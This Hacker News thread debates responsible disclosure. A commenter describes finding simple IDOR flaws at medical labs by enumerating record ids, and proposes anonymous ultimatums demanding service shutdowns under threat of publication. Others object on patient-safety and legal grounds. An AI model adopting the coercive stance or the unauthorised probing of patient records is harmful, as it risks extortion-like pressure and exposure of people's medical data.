Hacker Newsnew | past | comments | ask | show | jobs | submitlogin

I'm a bit conflicted about what responsible disclosure should be, but in many cases it seems like these conditions hold:

1) the hack is straightforward to do;

2) it can do a lot of damage (get PII or other confidential info in most cases);

3) downtime of the service wouldn't hurt anyone, especially if we compare it to the risk of the damage.

But, instead of insisting on the immediate shutting down of the affected service, we give companies weeks or months to fix the issue while notifying no one in the process and continuing with business as usual.

I've submitted 3 very easy exploits to 3 different companies the past year and, thankfully, they fixed them in about a week every time. Yet, the exploits were trivial (as I'm not good enough to find the hard ones, I admit). Mostly IDORs, like changing id=123456 to id=1 all the way up to id=123455 and seeing a lot medical data that doesn't belong to me. All 3 cases were medical labs because I had to have some tests done and wanted to see how secure my data was.

Sadly, in all 3 cases I had to send a follow-up e-mail after ~1 week, saying that I'll make the exploit public if they don't fix it ASAP. What happened was, again, in all 3 cases, the exploit was fixed within 1-2 days.

If I'd given them a month, I feel they would've fixed the issue after a month. If I'd given then a year - after a year.

And it's not like there aren't 10 different labs in my city. It's not like online access to results is critical, either. You can get a printed result or call them to write them down. Yes, it would be tedious, but more secure.

So I should've said from the beginning something like:

> I found this trivial exploit that gives me access to medical data of thousands of people. If you don't want it public, shut down your online service until you fix it, because it's highly likely someone else figured it out before me. If you don't, I'll make it public and ruin your reputation.

Now, would I make it public if they don't fix it within a few days? Probably not, but I'm not sure. But shutting down their service until the fix is in seems important. If it was some hard-to-do hack chaining several exploits, including a 0-day, it would be likely that I'd be the first one to find it and it wouldn't be found for a while by someone else afterwards. But ID enumerations? Come on.

So does the standard "responsible disclosure", at least in the scenario I've given (easy to do; not critical if the service is shut down), help the affected parties (the customers) or the businesses? Why should I care about a company worth $X losing $Y if it's their fault?

I think in the future I'll anonymously contact companies with way more strict deadlines if their customers (or others) are in serious risk. I'll lose the ability to brag with my real name, but I can live with it.

As to the other comments talking about how spammed their security@ mail is - that's the cost of doing business. It doesn't seem like a valid excuse to me. Security isn't one of hundreds random things a business should care about. It's one of the most important ones. So just assign more people to review your mail. If you can't, why are you handling people's PII?





Don't do this.

I understand you think you are doing the right thing but be aware that by shutting down a medical communication services there's a non-trivial chance someone will die because of slower test results.

Your responsibility is responsible disclosure.

Their responsibility is how to handle it. Don't try to decide that for them.


> I think in the future I'll anonymously contact companies with way more strict deadlines if their customers (or others) are in serious risk. I'll lose the ability to brag with my real name, but I can live with it.

What you're describing is likely a crime. The sad reality is most businesses don't view protection of customers' data as a sacred duty, but simply another of the innumerable risks to be managed in the course of doing business. If they can say "we were working on fixing it!" their asses are likely covered even if someone does leverage the exploit first—and worst-case, they'll just pay a fine and move on.


Precisely - they view security as just one part of many of their business, instead of viewing it as one of the most important parts. They've insured themselves against a breach, so it's not a big deal for them. But it should be.

The more casualties, the more media attention -> the more likely they, and others in their field, will take security more seriously in the future.

If we let them do nothing for a month, they'll eventually fix it, but in the mean time malicious hackers may gain access to the PII. They might not make it public, but sell that PII via black markets. The company may not get the negative publicity it deserves and likely won't learn to fix their systems in time and to adopt adequate security measures. The sale of the PII and the breach itself might become public knowledge months after the fact, while the company has had a chance to grow in the meantime, and make more security mistakes that may be exploited later on.

And yes, I know it may be a crime - that's why I said I'd report it anonymously from now on. But if the company sits on their asses for a month, shouldn't that count as a crime, as well? The current definition of responsible disclosure gives companies too much leeway, in my opinion.

If I knew I operated a service that was trivial to exploit and was hosting people's PII, I'd shut it down until I fixed it. People won't die if I make everything in my power to provide the test results (in my example of medical labs) to doctors and patients via other means, such as via paper or phone. And if people do die, it would be devastating, of course, but it would mean society has put too much trust into a single system without making sure it's not vulnerable to the most basic of attacks. So it would happen sooner or later, anyway. Although I can't imagine someone dying because their doctor had to make a phone call to the lab instead of typing in a URL.

The same argument about people dying due to the disruption of the medical communications system could be made about too-big-to-fail companies that are entrenched into society because a lot of pension funds have invested in them. If the company goes under, the innocent people dependent on the pension fund's finances would suffer. While they would suffer, which would be awful, of course, would the alternative be to not let such companies go bankrupt? Or would it be better for such funds to not rely so much on one specific company in the first place? That is to say, in both cases (security or stocks in general) the reality is that currently people are too dependent on a few singular entities, while they shouldn't be. That has to change, and the change has to begin somewhere.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: